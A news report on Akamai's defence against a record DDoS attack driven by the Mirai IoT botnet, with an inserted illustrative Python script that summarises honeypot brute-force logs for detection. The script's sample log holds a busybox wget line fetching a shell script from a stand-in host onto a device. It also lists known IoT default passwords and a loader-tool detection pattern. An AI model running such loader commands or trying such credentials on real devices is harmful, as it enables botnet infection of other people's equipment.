On 20 September, Akamai successfully defended against a DDoS attack exceeding 620 Gbps – nearly double the previous peak attack seen on its platform.
That attack generated interest in the role of IoT devices in DDoS attacks and in the Mirai source code.
“Based on [an] investigation and what we know from the DDoS attack, we can confirm that the Mirai botnet was a major participant in the attack,” said Akamai.
“While there may have been at least one other botnet involved, we cannot confirm that the attacks were coordinated.”
Akamai said it has been tracking the botnet for some time, and published a Threat Advisory on its dangers.
“The Threat Advisory detailed our examination of a known-vulnerable device in order to analyze trends in brute force login attacks on the Internet.”
“The device existed on a Public IP and had open ports for listening services such as Telnet, SSH, HTTP, SMTP, and more.”
“The first thing we observed was bots using default credentials associated with IoT and then we noticed commands that showed them attempting to load the malware.”
Akamai made the following observations:
- 100,000 login attempts were made from more than 1,800 IPs.
- The top source countries were China (64%), Colombia (13%), South Korea (6%), and Vietnam (6%).
- The most attacked protocols were SSH (57%) and Telnet (42%).
- The top usernames were root (75%), admin (10%), shell (6%), and sh (6%).
- The credentials most commonly tried were defaults for Internet-connected surveillance cameras and their associated DVR units.
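As an added illustration, not Akamai's code or data, the script below parses a handful of constructed honeypot log lines in a hypothetical key=value format and aggregates them the way the observations above are presented: attempts per protocol and per username as a percentage of the total, the number of distinct source IPs, hits on a small illustrative set of well-known IoT default credentials, and sources that logged in successfully and then issued a wget/tftp-style download command of the kind the quote describes. The log format, the credential list, and the loader-command pattern are all assumptions made for the example.

```python
"""Summarise brute-force login attempts and post-login loader commands from a honeypot log."""
import re
from collections import Counter

# Constructed sample lines in a hypothetical honeypot format (not Akamai's data).
SAMPLE_LOG = """\
2016-09-20T01:00:01Z proto=ssh src=203.0.113.10 user=root pass=xc3511 result=fail
2016-09-20T01:00:02Z proto=ssh src=203.0.113.10 user=root pass=vizxv result=fail
2016-09-20T01:00:03Z proto=telnet src=198.51.100.7 user=root pass=admin result=fail
2016-09-20T01:00:04Z proto=telnet src=198.51.100.7 user=admin pass=admin result=fail
2016-09-20T01:00:05Z proto=ssh src=192.0.2.44 user=shell pass=sh result=fail
2016-09-20T01:00:06Z proto=telnet src=192.0.2.44 user=root pass=root result=success
2016-09-20T01:00:07Z proto=telnet src=192.0.2.44 cmd="/bin/busybox wget http://192.0.2.99/x.sh -O /tmp/x.sh"
2016-09-20T01:00:08Z proto=ssh src=203.0.113.10 user=sh pass=sh result=fail
this line is garbage and should be skipped
"""

# Login attempt and post-login command lines (assumed format).
LOGIN_RE = re.compile(
    r"^(?P<ts>\S+) proto=(?P<proto>\w+) src=(?P<src>\S+) "
    r"user=(?P<user>\S+) pass=(?P<pw>\S+) result=(?P<result>\w+)$"
)
CMD_RE = re.compile(r'^(?P<ts>\S+) proto=(?P<proto>\w+) src=(?P<src>\S+) cmd="(?P<cmd>[^"]*)"$')

# Illustrative subset of widely published IoT default credentials (assumption: a real
# watch-list would be far longer and device-specific).
DEFAULT_CREDS = {("root", "xc3511"), ("root", "vizxv"), ("admin", "admin"), ("root", "root")}

# Tools bots typically use to pull a payload onto the device after logging in (assumption).
LOADER_RE = re.compile(r"\b(wget|tftp|curl|ftpget)\b")


def parse_line(line):
    """Return a dict for a login or command line, or None for anything else."""
    m = LOGIN_RE.match(line)
    if m:
        return {"kind": "login", **m.groupdict()}
    m = CMD_RE.match(line)
    if m:
        return {"kind": "cmd", **m.groupdict()}
    return None


def summarize(log_text):
    """Aggregate attempts by protocol, username and source; flag default-credential hits
    and sources that logged in and then ran a loader-style command."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    logins = [e for e in events if e["kind"] == "login"]
    cmds = [e for e in events if e["kind"] == "cmd"]

    successful = {e["src"] for e in logins if e["result"] == "success"}
    loader_cmds = [(e["src"], e["cmd"]) for e in cmds if LOADER_RE.search(e["cmd"])]

    return {
        "total_attempts": len(logins),
        "unique_sources": len({e["src"] for e in logins}),
        "by_proto": Counter(e["proto"] for e in logins),
        "by_user": Counter(e["user"] for e in logins),
        "by_source": Counter(e["src"] for e in logins),
        "default_cred_hits": sum((e["user"], e["pw"]) in DEFAULT_CREDS for e in logins),
        "successful_sources": successful,
        "loader_commands": loader_cmds,
        # Sources that both authenticated and tried to fetch something: the infection pattern.
        "post_compromise": {src for src, _ in loader_cmds if src in successful},
    }


def share(counter, total, n=4):
    """Top-n entries of a Counter as (key, percent of total), like the advisory's tables."""
    if total == 0:
        return []
    return [(k, round(100 * v / total)) for k, v in counter.most_common(n)]


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print("attempts:", s["total_attempts"], "from", s["unique_sources"], "sources")
    print("by protocol:", share(s["by_proto"], s["total_attempts"]))
    print("by username:", share(s["by_user"], s["total_attempts"]))
    print("default-credential hits:", s["default_cred_hits"])
    print("logged in and then fetched a payload:", sorted(s["post_compromise"]))
```

On real data the interesting output is the last line: a source that both authenticated with a default credential and immediately pulled a file is the infection event, whereas raw attempt counts mostly measure scanner noise.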
It said the attack was generated by a botnet made up primarily of Internet of Things devices, such as security cameras and DVRs.
The attack also included a substantial amount of traffic sent directly from the botnet to the target, rather than reflected and/or amplified traffic, as seen in recent large attacks that abused open NTP and DNS servers.